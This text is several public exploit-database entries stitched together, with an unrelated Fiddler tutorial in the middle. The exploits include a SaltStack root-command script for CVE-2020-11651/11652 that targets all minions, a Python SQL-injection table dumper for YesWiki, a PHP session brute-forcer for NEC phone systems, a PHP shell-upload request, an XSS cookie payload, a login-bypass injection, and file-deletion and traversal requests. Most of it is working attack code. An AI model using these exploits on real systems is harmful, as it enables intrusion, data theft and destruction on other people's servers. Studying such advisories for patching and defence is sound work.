submit job') return if rets.get('jid'): print('[+] Successfully scheduled job: {}'.format(rets['jid'])) def pwn_exec_all(channel, root_key, cmd, master_ip, jid): print("[+] Attemping to execute '{}' on all minions connected to {}".format(cmd, master_ip)) sys.stdout.flush() msg = { 'key': root_key, 'cmd': '_send_pub', 'fun': 'cmd.run', 'user': 'root', 'arg': [ "/bin/sh -c '{}'".format(cmd) ], 'tgt': '*', 'tgt_type': 'glob', 'ret': '', 'jid': jid } try: rets = channel.send(msg, timeout=3) except Exception as e: print('[-] Failed to submit job') return finally: if rets == None: print('[+] Successfully submitted job to all minions.') else: print('[-] Failed to submit job') def main(): parser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652') parser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1') parser.add_argument('--port', '-p', dest='master_port', default='4506') parser.add_argument('--force', '-f', dest='force', default=False, action='store_false') parser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true') parser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true') parser.add_argument('--read', '-r', dest='read_file') parser.add_argument('--upload-src', dest='upload_src') parser.add_argument('--upload-dest', dest='upload_dest') parser.add_argument('--exec', dest='exec', help='Run a command on the master') parser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions') args = parser.parse_args() print("[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.") time.sleep(1) # Both src and destination are required for uploads if (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None): print('[-] Must provide both --upload-src and --upload-dest') sys.exit(1) channel = init_minion(args.master_ip, args.master_port) check_connection(args.master_ip, args.master_port, channel) root_key = check_CVE_2020_11651(channel) if root_key: print('[*] root key obtained: {}'.format(root_key)) else: print('[-] Failed to find root key...aborting') sys.exit(127) if args.run_checks: # Assuming this check runs on the master itself, create a file with "secret" content # and abuse CVE-2020-11652 to read it. top_secret_file_path = '/tmp/salt_cve_teta' with salt.utils.fopen(top_secret_file_path, 'w') as fd: fd.write("top secret") # Again, this assumes we're running this check on the master itself with salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd: root_key = keyfd.read() check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path) check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key) check_CVE_2020_11652_write1(debug, channel, root_key) check_CVE_2020_11652_write2(debug, channel, root_key) os.remove(top_secret_file_path) sys.exit(0) if args.read_file: pwn_read_file(channel, root_key, args.read_file, args.master_ip) if args.upload_src: if os.path.isabs(args.upload_dest): print('[-] Destination path must be relative; aborting') sys.exit(1) pwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip) jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow()) if args.exec: pwn_exec(channel, root_key, args.exec, args.master_ip, jid) if args.exec_all: print("[!] Lester, is this what you want? Hit ^C to abort.") time.sleep(2) pwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid) if __name__ == '__main__': main()

# Exploit Title: Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path # Discovery by: Nguyen Khang - SunCSR # Discovery Date: 2020-05-03 # Vendor Homepage: https://www.oracle.com/ # Software Link: https://www.oracle.com/database/technologies/112010-win64soft.html # Tested Version: 11g release 2 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 10.0.18363 N/A Build 18363 # Step to discover Unquoted Service Path: C:\Users\cm0s>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ OracleDBConsoleorcl OracleDBConsoleorcl C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe Auto OracleOraDb11g_home1TNSListener OracleOraDb11g_home1TNSListener C:\Oracle\product\11.2.0\dbhome_1\BIN\TNSLSNR Auto OracleServiceORCL OracleServiceORCL c:\oracle\product\11.2.0\dbhome_1\bin\ORACLE.EXE ORCL Auto C:\Users\cm0s>sc qc OracleDBConsoleorcl [SC] QueryServiceConfig SUCCESS SERVICE_NAME: OracleDBConsoleorcl TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OracleDBConsoleorcl DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\cm0s>sc qc OracleOraDb11g_home1TNSListener [SC] QueryServiceConfig SUCCESS SERVICE_NAME: OracleOraDb11g_home1TNSListener TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Oracle\product\11.2.0\dbhome_1\BIN\TNSLSNR LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OracleOraDb11g_home1TNSListener DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\cm0s>sc qc OracleServiceORCL [SC] QueryServiceConfig SUCCESS SERVICE_NAME: OracleServiceORCL TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : c:\oracle\product\11.2.0\dbhome_1\bin\ORACLE.EXE ORCL LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OracleServiceORCL DEPENDENCIES : SERVICE_START_NAME : LocalSystem # Exploit: # A successful attempt would require the local user to be able to insert # their code in the system root path # undetected by the OS or other security applications where it could # potentially be executed during # application startup or reboot. If successful, the local user's code would # execute with the elevated # privileges of the application.

Fiddler is one of the most powerful and best-used web debugging tools, which can record http and https requests from all clients and servers. Allows you to monitor, set breakpoints, and even modify input and output data. Fiddler includes a powerful event script-based subsystem and can be extended using the .net language. In other words, the more you understand the HTTP protocol, the more you can master the use of Fiddler. The more you use Fiddler, the more it will help you understand the HTTP protocol. Fiddler is a very useful tool for developers or testers. Download and Install Let’s go directly to the official website to download. Official website address: https://www.telerik.com/fiddler The file is relatively small, about 6M. Install it directly after the download is completed. After the installation is completed, the effect is as follows Panel Introduction Left Panel : The order of HTTP Requests starts from 1, incrementing in the order of page loading requests. Result : The status of HTTP response Protocol: The protocol used by the request (such as HTTP/HTTPS) HOST: domain name/ip of the request address URL: The requested server path and file name, also contains GET parameters BODY: The size of the request, in units of byte Content-Type: The type of request response Caching: The requested cache expiration time or the cache control header value Process: The Windows process and process ID that issued this request Comments: User adds notes to this session through scripts or menus custom: Custom values that users can set through scripts Right Panel Statistics Statistics Through this tab, the user can obtain the total information statistics of these sessions by selecting multiple sessions, such as the number of bytes requested and transmitted. Select the first request and the last request to get the overall time spent on the entire page loading. From the bar chart, you can also distinguish which requests take the most time, so as to optimize the access speed of the page Inspectors check page tab It provides headers, textview, hexview, Raw and other methods to view the information of a single http request message. It is divided into two parts: the upper part is the HTTP Request display, and the lower part is the HTTPResponse display (response) display. AutoResponse Automatic Response Tab Fiddler's most practical function is that it can crawl online pages and save them locally for debugging, greatly reducing the difficulty of online debugging. It allows us to modify the data returned by the server, such as making the return all HTTP404 or reading local files as the return content. composer build tab Supports manual construction and sending HTTP, HTTPS and FTP requests. We can also drag the session from the web session list and put it in the composer tab. When we click the Execute button, we send the request to the server. log log tab: Print log Filters Filters Tab The filter can filter the data stream list on the left, and we can mark, modify, or hide data streams of certain characteristics. Catch HTTPS package By default, you can only capture http packets. If you want to capture https packets, we need simple settings. Click tool-options-https to check the following Then click Actions-Export Root Certificate to Desktop, and this file will appear on the desktop Next we need to import the certificate on the browser, taking Google Chrome as an example: Click Settings - Security and Privacy Settings - Security - Management Certificate Now we can catch the https package.

# Exploit Title: Online Clothing Store 1.0 - Persistent Cross-Site Scripting # Date: 2020-05-05 # Exploit Author: Sushant Kamble # Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 #Vulnerable Page: Offers.php #Parameter Vulnerable: Offer Detail ONLINE CLOTHING STORE 1.0 is vulnerable to Stored XSS Admin user can add malicious script to offer page. when a normal user visit a page. A script gets executed. # Exploit: Open offer.php Add below script in Offer Detail <script>alert(document.cookie)</script> Save

# Title: NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration # Author: Cold z3ro # Date: 2020-05-04 # Homepage: https://www.0x30.cc/ # Vendor Homepage: https://www.nec.com # Version: 01.03.01 # Discription: NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration <?php set_time_limit(0); $host = "192.168.0.14"; $start = 100; $end = 30000; $maxproc= 50; $execute=0; echo "\n[+] NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration\n\n"; sleep(3); for ($i = $start; $i <= $end; $i++) { $pid = @pcntl_fork(); $execute++; if ($execute >= $maxproc) { while (pcntl_waitpid(0, $status) != -1) { $status = pcntl_wexitstatus($status); $execute =0; usleep(3000); } } if (!$pid) { echo $url . " checking $i\n"; login($url, $i); flush(); exit; } } function login($url, $key) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url .'/PyxisUaMenu.htm?sessionId='.$key.'&MAINFRM(444,-1,591)#'); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 80); curl_setopt($ch, CURLOPT_TIMEOUT, 80); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); curl_setopt($ch, CURLOPT_HEADER, FALSE); $content = curl_exec($ch); curl_close ($ch); if(preg_match('/Telephone/i', $content) || preg_match('/Mailbox/i', $content)) { die("\n\n[+][-]".$url."/PyxisUaMenu.htm?sessionId=".$key."&MAINFRM(444,-1,591)# => Found\n\n"); } }

# Exploit Title: i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion # Date: 2020-05-02 # Author: Besim ALTINOK # Vendor Homepage: https://www.i-doit.org/ # Software Link: https://sourceforge.net/projects/i-doit/ # Version: v1.14.1 # Tested on: Xampp # Credit: İsmail BOZKURT -------------------------------------------------------------------------------------------------- Vulnerable Module ---> Import Module Vulnerable parameter ---> delete_import ----------- PoC ----------- POST /idoit/?moduleID=50&param=1&treeNode=501&mNavID=2 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 ****************************** Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/idoit/?moduleID=50&param=1&treeNode=501&mNavID=2 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.7.3 Content-type: application/x-www-form-urlencoded; charset=UTF-8 X-i-doit-Tenant-Id: 1 Content-Length: 30 DNT: 1 Connection: close Cookie: PHPSESSID=bf21********************************68b8 delete_import=Type the filename, you want to delete from the server here

# Exploit Title: PhreeBooks ERP 5.2.5 - Remote Command Execution # Date: 2020-05-01 # Author: Besim ALTINOK # Vendor Homepage: https://www.phreesoft.com/ # Software Link: https://sourceforge.net/projects/phreebooks/ # Version: v5.2.4, v5.2.5 # Tested on: Xampp # Credit: İsmail BOZKURT ------------------------------------------------------------------------------------- There are no file extension controls on Image Manager (5.2.4) and on Backup Restore. If an authorized user is obtained, it is possible to run a malicious PHP file on the server. -------------------------------------------------------------------------------------- One of the Vulnerable File: (backup.php) ----------------------------------------- RCE PoC (Upload Process) -------------------------------------------------------------------------------------- POST /pblast/index.php?&p=bizuno/backup/uploadRestore HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 ********************* Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/pblast/index.php?&p=bizuno/backup/managerRestore X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------39525038724866743160620170 Content-Length: 231 DNT: 1 Connection: close Cookie: ************************************************** -----------------------------39525038724866743160620170 Content-Disposition: form-data; name="fldFile"; filename="shell.php" Content-Type: text/php <? phpinfo(); ?> -----------------------------39525038724866743160620170-- Shell directory: ------------------------------- - http://localhost/pblast/myFiles/backups/shell.php

# Title: SimplePHPGal 0.7 - Remote File Inclusion # Author: h4shur # date:2020-05-05 # Vendor Homepage: https://johncaruso.ca # Software Link: https://johncaruso.ca/phpGallery/ # Software Link: https://sourceforge.net/projects/simplephpgal/ # Tested on: Windows 10 & Google Chrome # Category : Web Application Bugs # Dork : intext:"Created with Simple PHP Photo Gallery" intext:"Created by John Caruso" ### Note: * Another web application bug is the RFI bug, which can be very dangerous And stands for Remote File Inclusion, which directly executes loose scripts on the server Also, this security hole is created by programmer errors And you must be fluent in programming language to secure and prevent this bug And you have to control the inputs of the application and use powerful firewalls * This bug is one of the most dangerous bugs and the access that the intruder can gain using this bug is the implementation of Shell script In fact, by running Shell script, it will have relatively complete access to the Target site server If we want to explain it in text, the hacker will execute the shell by giving a link from Shell script in txt format to the input of the vulnerable site. * what's the solution ? Check the file entered by the user from a list and enter it if the file was in the list. Example : <?php $files=array('test.gif'); if(in_array($_GET['file'], $files)){ include ($_GET['file']); } ?> * If you are a server administrator, turn off allow_url_fopen from the file. * Or do it with the ini_set command. Only for (RFI) <?php ini_set('allow_url_fopen ', 'Off'); ?> * We can use the strpos command to check that if the address is: // http, the file will not be enclosed (it can only block RFI) <?php $strpos = strpos($_GET['url'],'http://'); if(!$strpos){ include($_GET['url']); } ?> * Using str_replace we can give the given address from two characters "/", "." Let's clean up. <?php $url=$_GET['url']; $url = str_replace("/", "", $url); $url = str_replace(".", "", $url); include($url); ?> ### Poc : [+] site.com/image.php?img= [ PAYLOAD ]

# Exploit Title: Online Clothing Store 1.0 - 'username' SQL Injection # Date: 2020-05-05 # Exploit Author: Sushant Kamble # Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 --------------------------------------------------------------------------------- #parameter Vulnerable: username # Injected Request POST /online%20Clothing%20Store/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 55 Origin: http://localhost Connection: close Referer: http://localhost/online%20Clothing%20Store/ Cookie: PHPSESSID=shu3nbnsdkb4nb73iips4jkrn7 Upgrade-Insecure-Requests: 1 txtUserName=admin'or''='&txtPassword=anything&rdType=Admin&button=Login

# Exploit Title: Booked Scheduler 2.7.7 - Authenticated Directory Traversal # Date: 2020-05-03 # Author: Besim ALTINOK # Vendor Homepage: https://www.bookedscheduler.com # Software Link: https://sourceforge.net/projects/phpscheduleit/ # Version: v2.7.7 # Tested on: Xampp # Credit: İsmail BOZKURT Description: ---------------------------------------------------------- Vulnerable Parameter: $tn Vulnerable File: manage_email_templates.php PoC ----------- GET /booked/Web/admin/manage_email_templates.php?dr=template&lang=en_us&tn=vulnerable-parameter&_=1588451710324 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 *************************** Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/booked/Web/admin/manage_email_templates.php X-Requested-With: XMLHttpRequest DNT: 1 Connection: close Cookie: new_version=v%3D2.7.7%2Cfs%3D1588451441; PHPSESSID=94129ac9414baee8c6ca2f19ab0bcbec

# Exploit Title: YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection # Date: 2020-04-25 # Exploit Author: coiffeur # Vendor Homepage: https://yeswiki.net/ # Software Link: https://yeswiki.net/, https://github.com/YesWiki/yeswiki # Version: YesWiki cercopitheque < 2020-04-18-1 import sys import requests DEBUG = 0 def usage(): banner = """NAME: YesWiki cercopitheque 2020-04-18-1, SQLi SYNOPSIS: python sqli_2020.04.18.1.py <URL> [OPTIONS]... DESCRIPTION: -lt, list tables. -dt <TABLE>, dump table. AUTHOR: coiffeur """ print(banner) def parse(text): deli_l = 'ABCAABBCC|' deli_r = '|ABCAABBCC' if (text.find(deli_l) == -1) or (text.find(deli_r) == -1): print('[x] Delimiter not found, please try to switch to a Time Based SQLi') exit(-1) start = text.find(deli_l) + len(deli_l) end = start + text[start::].find(deli_r) return text[start:end] def render(elements): print(elements) def get_count(t_type, table_name=None, column_name=None): if t_type == 'table': payload = '?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(TABLE_NAME),0x7c,0x414243414142424343) FROM information_schema.tables),NULL,NULL,NULL,NULL,NULL-- -' if DEBUG > 1: print(f'[DEBUG] {payload}') r = requests.get(url=f'{sys.argv[1]}{payload}') if r.status_code == 200: data = parse(r.text) if t_type == 'column': payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(COLUMN_NAME),0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}"),NULL,NULL,NULL,NULL,NULL-- -' if DEBUG > 1: print(f'[DEBUG] {payload}') r = requests.get(url=f'{sys.argv[1]}{payload}') data = parse(r.text) if t_type == 'element': payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count({column_name}),0x7c,0x414243414142424343) FROM {table_name}),NULL,NULL,NULL,NULL,NULL-- -' if DEBUG > 1: print(f'[DEBUG] {payload}') r = requests.get(url=f'{sys.argv[1]}{payload}') data = parse(r.text) return int(data) def list_tables(): tables_count = get_count(t_type='table') print(f'[+] Tables found: {tables_count}') tables = [] for i in range(0, tables_count): payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,TABLE_NAME,0x7c,0x414243414142424343) FROM information_schema.tables LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -' if DEBUG > 1: print(f'[DEBUG] {payload}') r = requests.get(url=f'{sys.argv[1]}{payload}') if r.status_code == 200: talbe = parse(r.text) print(f'\t{talbe}') tables.append(talbe) return tables def list_columns(table_name): columns_count = get_count(t_type='column', table_name=table_name) print(f'[+] Columns found: {columns_count}') columns = [] for i in range(0, columns_count): payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,COLUMN_NAME,0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}" LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -' if DEBUG > 1: print(f'[DEBUG] {payload}') r = requests.get(url=f'{sys.argv[1]}{payload}') if r.status_code == 200: column = parse(r.text) if DEBUG > 0: print(f'\t{column}') columns.append(column) return columns def dump_table(name): columns = list_columns(name) elements = [None]*len(columns) for i in range(0, len(columns)): elements_count = get_count( t_type='element', table_name=name, column_name=columns[i]) if DEBUG > 0: print(f'[+] Dumping: {columns[i]} ({elements_count} rows)') element = [] for j in range(0, elements_count): payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,{columns[i]},0x7c,0x414243414142424343) FROM {name} LIMIT 1 OFFSET {j}),NULL,NULL,NULL,NULL,NULL-- -' if DEBUG > 1: print(f'[DEBUG] {payload}') r = requests.get(url=f'{sys.argv[1]}{payload}') if r.status_code == 200: element.append(parse(r.text)) if DEBUG > 0: print(f'\t{element[-1]}') elements[i] = element render(elements) return elements def main(): if len(sys.argv) < 3: print(usage()) exit(-1) if sys.argv[2] == '-lt': list_tables() if sys.argv[2] == '-dt': dump_table(sys.argv[3]) if __name__ == "__main__": main()

# Exploit Title: webTareas 2.0.p8 - Arbitrary File Deletion # Date: 2020-05-02 # Author: Besim ALTINOK # Vendor Homepage: https://sourceforge.net/projects/webtareas/files/ # Software Link: https://sourceforge.net/projects/webtareas/files/ # Version: v2.0.p8 # Tested on: Xampp # Credit: İsmail BOZKURT Description: -------------------------------------------------------------------------------------- - print_layout.php is vulnerable. When you sent PoC code to the server and If there is no file on the server, you can see, this error message <br /> <b>Warning</b>: unlink(/Applications/XAMPP/xamppfiles/htdocs/webtareas/files/PrintLayouts/tester.png.php--1.zip): No such file or directory in <b>/Applications/XAMPP/xamppfiles/htdocs/webtareas/includes/library.php</b> on line <b>1303</b><br /> - So, Here, you can delete file with unlink function. - And, I ddi try again with another file, I deleted from the server. -------------------------------------------------------------------------------------------- Arbitrary File Deletion PoC --------------------------------------------------------------------------------------- POST /webtareas/administration/print_layout.php?doc_type=11&doc_type_ex=&id=1&mode=edit&borne1=0 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 *********************** Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/webtareas/administration/print_layout.php?doc_type=11&doc_type_ex=&mode=edit&borne1=0&id=1 Content-Type: multipart/form-data; boundary=---------------------------3678767312987982041084647942 Content-Length: 882 DNT: 1 Connection: close Cookie: webTareasSID=4b6a4799c9e7906a06c574dc48ffb730; PHPSESSIDwebERPteam=9b2b068ea2de93ed1ee0aafe27818191 Upgrade-Insecure-Requests: 1 -----------------------------3678767312987982041084647942 Content-Disposition: form-data; name="action" edit -----------------------------3678767312987982041084647942 Content-Disposition: form-data; name="desc" <p>tester</p> -----------------------------3678767312987982041084647942 Content-Disposition: form-data; name="file1"; filename="" Content-Type: application/octet-stream -----------------------------3678767312987982041084647942 Content-Disposition: form-data; name="attnam1" -----------------------------3678767312987982041084647942 Content-Disposition: form-data; name="atttmp1" --add the delete file name here-- -----------------------------3678767312987982041084647942 Content-Disposition: form-data; name="sp" -----------------------------3678767312987982041084647942--